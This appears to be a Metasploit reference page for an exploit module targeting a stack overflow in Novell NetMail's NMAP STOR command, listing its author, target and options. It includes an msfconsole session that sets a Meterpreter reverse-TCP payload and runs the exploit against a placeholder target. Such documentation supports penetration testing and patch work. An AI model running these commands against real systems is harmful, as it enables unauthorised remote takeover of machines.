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Novell NetMail <= 3.52d NMAP STOR Buffer Overflow

This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.

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Exploit Rank

  • Average

Exploit Authors

  • MC < mc [at] metasploit.com >

Vulnerability References


Exploit Targets

  • 0 - Windows 2000 Pro SP4 English (default)

Exploit Development


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Exploit Usage Information

$ msfconsole

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####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
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##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/novell/nmap_stor
msf exploit(nmap_stor) > show payloads
msf exploit(nmap_stor) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(nmap_stor) > set LHOST [MY IP ADDRESS]
msf exploit(nmap_stor) > set RHOST [TARGET IP]
msf exploit(nmap_stor) > exploit


Exploit Module Options

RHOST The target address
RPORT The target port (default: 689)
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
Proxies Use a proxy chain
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)